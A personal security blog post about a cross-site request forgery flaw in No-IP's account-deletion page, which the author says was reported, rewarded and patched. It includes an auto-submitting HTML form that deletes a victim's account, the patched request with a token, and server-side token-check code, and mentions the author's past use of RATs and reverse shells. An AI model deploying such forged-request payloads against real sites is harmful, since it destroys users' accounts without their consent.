No-IP is a free DNS service provider for users. I signed up for an account when I was eleven, a long time back. Mainly I used it for configuring my RATs (Remote Administration Tools), forwarding the connection from the No-IP DNS to my external IP. That was a long time back and I used it for testing purposes only. After that I never wanted to use a DNS service for any reason. One day I accidentally visited no-ip and to my surprise my previous account, which I had created a long time back, was still active 🙂
I did not have any intention of finding any kind of vulnerability. But at that moment my Burp Suite was in intercepting mode and I was experimenting with another web application. I created a new no-ip account for testing some of my reverse TCP DNS shells. After the testing was done I just deleted my account since it was a fake random account. As time passed while I was testing my other application and my shells, I saw the HTTP request for the deletion of my fake no-ip account in the history. It used no XSRF token. W00t! I was able to delete any account when the user just opens my malicious request. Well, here is the proof of concept.
```html
<html>
<!--
Title: NOIP.COM Permanent Delete Account Exploit
Author: Osanda Malith (@OsandaMalith)
Date: 05th April 2014
-->
<body>
<form name="exploit" action="https://www.noip.com/members/account/delete.php" method="POST">
<input type="hidden" name="deleteAccount" value="yes" />
<input type="hidden" name="delete" value="delete" />
<input type="hidden" name="submit" value="Change" />
<script>document.exploit.submit(); </script>
</form>
</body>
</html>
```
As soon as I found this I reported it to NoIP and I got rewarded with two t-shirts, some stickers and a nice letter 🙂
Now the issue is patched as they have a valid token.
```
POST /members/account/delete.php HTTP/1.1
Host: www.noip.com
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://www.noip.com/members/account/delete.php
Cookie:
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 58

token=glXd3wIAPR8y2y9O&delete=delete&submit=Delete+Account
```
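The difference between the two requests above comes down to a server-side check like the following. This is an added example, not No-IP's code and not part of the original post: the handler name, the status codes and the HMAC-over-session-id token scheme are assumptions chosen for illustration, since the post does not say how the real token is generated.

```python
import hashlib
import hmac
import secrets
from urllib.parse import parse_qs

# Assumption: a per-deployment secret held only by the server.
SERVER_KEY = secrets.token_bytes(32)

# Constructed sample: the body the original proof of concept sends (no token).
FORGED_BODY = "deleteAccount=yes&delete=delete&submit=Change"


def issue_token(session_id: str) -> str:
    """Token bound to one session, embedded in the form the server renders."""
    return hmac.new(SERVER_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def patched_body(session_id: str) -> str:
    """Constructed sample: body in the shape of the patched request."""
    return f"token={issue_token(session_id)}&delete=delete&submit=Delete+Account"


def handle_delete(method: str, session_id: str, body: str) -> int:
    """Hypothetical delete handler; returns the HTTP status it would send."""
    if method != "POST":
        return 405  # state-changing action must not be reachable via GET
    if not session_id:
        return 401  # no authenticated session cookie
    fields = parse_qs(body, keep_blank_values=True)
    supplied = fields.get("token", [""])[0]
    expected = issue_token(session_id)
    # Compare as bytes: compare_digest rejects non-ASCII str input,
    # and a constant-time compare avoids leaking matching prefixes.
    if not hmac.compare_digest(supplied.encode(), expected.encode()):
        return 403  # missing, forged, or another session's token
    if fields.get("delete") != ["delete"]:
        return 400
    return 200  # the account deletion would be performed here


if __name__ == "__main__":
    sid = "constructed-session-A"
    print("cross-site form :", handle_delete("POST", sid, FORGED_BODY))
    print("same-site form  :", handle_delete("POST", sid, patched_body(sid)))
    print("token from other session:",
          handle_delete("POST", "constructed-session-B", patched_body(sid)))
```

A page on another origin can make the browser attach the victim's cookie, but it cannot read the token the server embedded in the genuine form, so its request fails the comparison.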
So this bug reminded me of my childhood 🙂 Nothing serious, it’s just XSRF. I never used DNS services for spreading malware or anything unethical. Basically, when I was a kid it was for my curiosity to learn.